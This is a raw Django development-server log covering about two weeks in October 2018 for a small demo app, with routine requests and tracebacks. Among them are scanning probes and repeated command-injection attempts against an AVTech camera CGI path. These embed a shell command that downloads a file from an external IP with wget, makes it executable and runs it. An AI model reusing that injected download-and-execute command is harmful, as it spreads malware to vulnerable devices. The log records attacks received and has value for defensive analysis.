  File "/usr/lib/python3.5/socketserver.py", line 625, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 354, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.5/socketserver.py", line 681, in __init__
    self.handle()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 139, in handle
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.5/socket.py", line 575, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[13/Oct/2018 21:27:31] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[13/Oct/2018 21:27:31] "  *%à     Cookie: mstshash=Test" 400 -
[13/Oct/2018 21:27:31] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[13/Oct/2018 21:27:31] "  *%à     Cookie: mstshash=Test" 400 -
[14/Oct/2018 02:14:04] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Oct/2018 02:14:04] "  /*à     Cookie: mstshash=Administr" 400 -
[14/Oct/2018 03:46:23] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[14/Oct/2018 05:24:49] "GET / HTTP/1.0" 400 60183
[14/Oct/2018 08:06:03] code 400, message Bad HTTP/0.9 request type ('\x00\x00\x00')
[14/Oct/2018 08:06:03] "    c                           " 400 -
[14/Oct/2018 09:56:02] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Oct/2018 09:56:02] "  /*à     Cookie: mstshash=Administr" 400 -
Traceback (most recent call last):
  File "/usr/lib/python3.5/socketserver.py", line 625, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 354, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.5/socketserver.py", line 681, in __init__
    self.handle()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 139, in handle
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.5/socket.py", line 575, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[14/Oct/2018 12:22:41] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[14/Oct/2018 12:22:41] "  *%à     Cookie: mstshash=Test" 400 -
[14/Oct/2018 12:22:41] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[14/Oct/2018 12:22:41] "  *%à     Cookie: mstshash=Test" 400 -
[14/Oct/2018 18:34:06] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Oct/2018 18:34:06] "  /*à     Cookie: mstshash=Administr" 400 -
[14/Oct/2018 23:31:41] "GET / HTTP/1.1" 200 3464
Not Found: /favicon.ico
[14/Oct/2018 23:31:42] "GET /favicon.ico HTTP/1.1" 404 2550
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[15/Oct/2018 03:14:42] "GET / HTTP/1.0" 400 60183
[15/Oct/2018 10:53:39] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00+&à\x00\x00\x00\x00\x00Cookie:')
[15/Oct/2018 10:53:39] "  +&à     Cookie: mstshash=hello" 400 -
[15/Oct/2018 17:22:10] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[15/Oct/2018 17:22:10] "  /*à     Cookie: mstshash=Administr" 400 -
[15/Oct/2018 18:12:16] code 400, message Bad request syntax ('\x00\x00\x00TZ\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x04\x010I\x00\x00\x00\x00\x80\x0b¨À\x00\x0c)t F\x07\x00tsXrcsXYs9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00bbXcsXctst\x00\x00\x00\x00\x00\x00')
[15/Oct/2018 18:12:16] "   TZ          0I    ¨À )t F tsXrcsXYs9                      bbXcsXctst      " 400 -
Traceback (most recent call last):
  File "/usr/lib/python3.5/socketserver.py", line 625, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 354, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.5/socketserver.py", line 681, in __init__
    self.handle()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 139, in handle
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.5/socket.py", line 575, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[15/Oct/2018 21:47:23] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[15/Oct/2018 21:47:23] "  *%à     Cookie: mstshash=Test" 400 -
[15/Oct/2018 21:47:24] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[15/Oct/2018 21:47:24] "  *%à     Cookie: mstshash=Test" 400 -
[15/Oct/2018 23:25:16] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[15/Oct/2018 23:25:16] "  /*à     Cookie: mstshash=Administr" 400 -
[15/Oct/2018 23:31:05] "GET / HTTP/1.1" 200 3464
[15/Oct/2018 23:31:05] "GET / HTTP/1.1" 200 3464
[15/Oct/2018 23:31:05] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /cgi-bin/nobody/Search.cgi
[16/Oct/2018 02:39:36] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 64415
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /cgi-bin/nobody/Search.cgi
[16/Oct/2018 04:07:45] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 64417
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /cgi-bin/nobody/Search.cgi
[16/Oct/2018 07:27:50] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 64417
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /cgi-bin/nobody/Search.cgi
[16/Oct/2018 09:38:34] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 64417
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /cgi-bin/nobody/Search.cgi
[16/Oct/2018 09:40:30] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 64417
[16/Oct/2018 10:28:38] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /cgi-bin/nobody/Search.cgi
[16/Oct/2018 23:11:31] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 64418
[16/Oct/2018 23:50:24] "GET / HTTP/1.1" 200 3464
[16/Oct/2018 23:50:28] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[16/Oct/2018 23:50:28] "GET /favicon.ico HTTP/1.1" 404 2550
[16/Oct/2018 23:50:32] "GET / HTTP/1.1" 200 3464
[16/Oct/2018 23:50:32] "GET /api/person/1/ HTTP/1.1" 200 285
[16/Oct/2018 23:50:35] "GET / HTTP/1.1" 200 3464
[16/Oct/2018 23:50:35] "GET /api/person/1/ HTTP/1.1" 200 285
[16/Oct/2018 23:50:39] "GET / HTTP/1.1" 200 3464
[16/Oct/2018 23:50:39] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /status
[17/Oct/2018 04:36:31] "GET /status HTTP/1.1" 404 2535
[17/Oct/2018 10:53:16] "GET / HTTP/1.1" 200 3464
[17/Oct/2018 11:13:11] "GET / HTTP/1.1" 200 3464
Not Found: /verifylogin.do
[17/Oct/2018 12:50:54] "GET /verifylogin.do HTTP/1.1" 404 2559
Not Found: /invoker/readonly
[17/Oct/2018 12:50:54] "GET /invoker/readonly HTTP/1.1" 404 2565
Not Found: /indexweb4.jsp/
[17/Oct/2018 12:50:57] "PUT /indexweb4.jsp/ HTTP/1.1" 404 2559
[17/Oct/2018 12:50:57] "GET / HTTP/1.1" 200 3464
[18/Oct/2018 03:31:45] "GET / HTTP/1.1" 200 3464
[18/Oct/2018 04:41:46] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[18/Oct/2018 04:41:46] "  /*à     Cookie: mstshash=Administr" 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[18/Oct/2018 05:28:51] "GET / HTTP/1.0" 400 60182
[18/Oct/2018 20:02:26] "GET / HTTP/1.1" 200 3464
[18/Oct/2018 20:02:26] "GET /api/person/1/ HTTP/1.1" 200 285
[18/Oct/2018 20:02:33] "GET /image.jpg HTTP/1.1" 200 44969
[18/Oct/2018 20:02:39] "GET /admin/ HTTP/1.1" 200 5794
[18/Oct/2018 20:02:40] "GET /static/admin/css/base.css HTTP/1.1" 200 16225
[18/Oct/2018 20:02:40] "GET /static/admin/css/dashboard.css HTTP/1.1" 200 412
[18/Oct/2018 20:02:40] "GET /static/admin/css/responsive.css HTTP/1.1" 200 17976
[18/Oct/2018 20:02:40] "GET /static/admin/css/fonts.css HTTP/1.1" 200 423
[18/Oct/2018 20:02:40] "GET /static/admin/img/icon-changelink.svg HTTP/1.1" 200 380
[18/Oct/2018 20:02:40] "GET /static/admin/img/icon-addlink.svg HTTP/1.1" 200 331
[18/Oct/2018 20:02:40] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.1" 200 80304
[18/Oct/2018 20:02:40] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.1" 200 82564
[18/Oct/2018 20:02:40] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.1" 200 81348
[18/Oct/2018 21:05:33] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[18/Oct/2018 21:05:33] "  /*à     Cookie: mstshash=Administr" 400 -
[19/Oct/2018 00:22:45] "GET / HTTP/1.1" 200 3464
[19/Oct/2018 12:15:00] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[19/Oct/2018 12:15:00] "  /*à     Cookie: mstshash=Administr" 400 -
Traceback (most recent call last):
  File "/usr/lib/python3.5/socketserver.py", line 625, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 354, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.5/socketserver.py", line 681, in __init__
    self.handle()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 139, in handle
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.5/socket.py", line 575, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[19/Oct/2018 16:44:22] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[19/Oct/2018 16:44:22] "  *%à     Cookie: mstshash=Test" 400 -
[19/Oct/2018 16:44:22] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[19/Oct/2018 16:44:22] "  *%à     Cookie: mstshash=Test" 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /cgi-bin/nobody/Search.cgi
[19/Oct/2018 17:33:46] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 64414
[19/Oct/2018 21:38:19] "GET / HTTP/1.1" 200 3464
[19/Oct/2018 21:38:20] "GET /api/person/1/ HTTP/1.1" 200 285
[19/Oct/2018 21:38:24] "GET / HTTP/1.1" 200 3464
[19/Oct/2018 21:38:24] "GET /api/person/1/ HTTP/1.1" 200 285
[20/Oct/2018 01:44:48] code 400, message Bad request version ("\x16sï\x03óa+U=\x94\x00\x008À,À+À0À/\x00\x9f\x00\x9eÀ$À#À(À'À")
[20/Oct/2018 01:44:48] You're accessing the development server over HTTPS, but it only supports HTTP.

[20/Oct/2018 01:44:52] code 400, message Bad request version ("L¥?ä\x8cßþ\x00\x008À,À+À0À/\x00\x9f\x00\x9eÀ$À#À(À'À")
[20/Oct/2018 01:44:52] You're accessing the development server over HTTPS, but it only supports HTTP.

[20/Oct/2018 03:40:44] "GET / HTTP/1.1" 200 3464
[20/Oct/2018 03:40:45] "GET /api/person/1/ HTTP/1.1" 200 285
[20/Oct/2018 03:40:53] "GET /admin HTTP/1.1" 301 0
[20/Oct/2018 03:40:54] "GET /admin/ HTTP/1.1" 302 0
[20/Oct/2018 03:40:54] "GET /admin/login/?next=/admin/ HTTP/1.1" 200 1819
[20/Oct/2018 03:40:54] "GET /static/admin/css/base.css HTTP/1.1" 200 16225
[20/Oct/2018 03:40:54] "GET /static/admin/css/login.css HTTP/1.1" 200 1203
[20/Oct/2018 03:40:54] "GET /static/admin/css/responsive.css HTTP/1.1" 200 17976
[20/Oct/2018 03:40:54] "GET /static/admin/css/fonts.css HTTP/1.1" 200 423
[20/Oct/2018 03:40:54] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.1" 200 80304
[20/Oct/2018 03:40:54] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.1" 200 81348
[20/Oct/2018 07:07:48] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /cgi-bin/nobody/Search.cgi
[20/Oct/2018 07:18:27] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 64415
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /cgi-bin/nobody/Search.cgi
[20/Oct/2018 11:38:59] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 64418
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[21/Oct/2018 04:37:23] "GET / HTTP/1.0" 400 60184
Traceback (most recent call last):
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 279, in write
    self._write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 463, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.5/socket.py", line 593, in write
    return self._sock.send(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Oct/2018 04:37:23] "GET / HTTP/1.0" 500 59
Traceback (most recent call last):
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 279, in write
    self._write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 463, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.5/socket.py", line 593, in write
    return self._sock.send(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 86, in handle_error
    super().handle_error()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.5/socketserver.py", line 625, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 354, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.5/socketserver.py", line 681, in __init__
    self.handle()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 154, in handle
    handler.run(self.server.get_app())
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/lib/python3.5/wsgiref/simple_server.py", line 36, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
[21/Oct/2018 12:16:36] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[21/Oct/2018 12:16:36] "  /*à     Cookie: mstshash=Administr" 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[21/Oct/2018 17:20:13] "GET / HTTP/1.0" 400 60181
[21/Oct/2018 19:51:41] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[22/Oct/2018 00:05:43] "GET / HTTP/1.0" 400 60183
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[22/Oct/2018 00:05:45] "GET / HTTP/1.0" 400 60183
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[22/Oct/2018 00:24:23] "GET / HTTP/1.0" 400 60184
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[22/Oct/2018 01:36:34] "GET / HTTP/1.0" 400 60181
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[22/Oct/2018 03:52:23] "GET / HTTP/1.0" 400 60181
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[22/Oct/2018 07:23:41] "GET / HTTP/1.0" 400 60181
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[22/Oct/2018 09:06:30] "GET / HTTP/1.0" 400 60181
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[22/Oct/2018 12:24:29] "GET / HTTP/1.0" 400 60180
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /cgi-bin/nobody/Search.cgi
[22/Oct/2018 15:06:18] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 64413
[22/Oct/2018 15:13:39] "GET / HTTP/1.1" 200 3464
Not Found: /favicon.ico
[22/Oct/2018 15:13:40] "GET /favicon.ico HTTP/1.1" 404 2550
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[22/Oct/2018 17:03:41] "GET / HTTP/1.0" 400 60182
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[22/Oct/2018 21:45:31] "GET / HTTP/1.0" 400 60182
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[22/Oct/2018 22:44:46] "GET / HTTP/1.0" 400 60184
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[22/Oct/2018 23:41:58] "GET / HTTP/1.0" 400 60182
[23/Oct/2018 01:09:43] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[23/Oct/2018 01:09:43] "  /*à     Cookie: mstshash=Administr" 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[23/Oct/2018 02:10:56] "GET / HTTP/1.0" 400 60181
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[23/Oct/2018 02:13:16] "GET / HTTP/1.0" 400 60182
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[23/Oct/2018 07:44:43] "GET / HTTP/1.0" 400 60181
[23/Oct/2018 11:04:43] "GET / HTTP/1.1" 200 3464
[23/Oct/2018 16:46:48] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[23/Oct/2018 16:46:48] "  /*à     Cookie: mstshash=Administr" 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[23/Oct/2018 21:09:20] "GET / HTTP/1.0" 400 60183
Traceback (most recent call last):
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 279, in write
    self._write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 463, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.5/socket.py", line 593, in write
    return self._sock.send(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[23/Oct/2018 21:09:20] "GET / HTTP/1.0" 500 59
Traceback (most recent call last):
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 279, in write
    self._write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 463, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.5/socket.py", line 593, in write
    return self._sock.send(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 86, in handle_error
    super().handle_error()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.5/socketserver.py", line 625, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 354, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.5/socketserver.py", line 681, in __init__
    self.handle()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 154, in handle
    handler.run(self.server.get_app())
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/lib/python3.5/wsgiref/simple_server.py", line 36, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
[23/Oct/2018 23:14:40] "GET / HTTP/1.1" 200 3464
Not Found: /favicon.ico
[23/Oct/2018 23:14:45] "GET /favicon.ico HTTP/1.1" 404 2550
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[24/Oct/2018 02:32:14] "GET / HTTP/1.0" 400 60183
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[24/Oct/2018 04:37:20] "GET / HTTP/1.0" 400 60182
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[24/Oct/2018 06:05:47] "GET / HTTP/1.0" 400 60182
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[24/Oct/2018 13:07:49] "GET / HTTP/1.0" 400 60181
[24/Oct/2018 16:27:17] "GET / HTTP/1.1" 200 3464
Not Found: /favicon.ico
[24/Oct/2018 16:27:18] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 16:27:18] "GET /api/person/1/ HTTP/1.1" 200 285
[24/Oct/2018 16:35:46] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 16:35:47] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 16:35:47] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 16:36:12] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 16:36:13] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 16:36:13] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 16:40:41] "GET /api/person/1/ HTTP/1.1" 200 285
[24/Oct/2018 16:44:10] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 16:44:11] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 16:44:11] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 16:47:12] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 16:47:12] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 16:47:12] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 16:48:05] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 16:48:06] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 16:48:06] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 16:48:50] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 16:48:51] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 16:48:51] "GET /favicon.ico HTTP/1.1" 404 2550
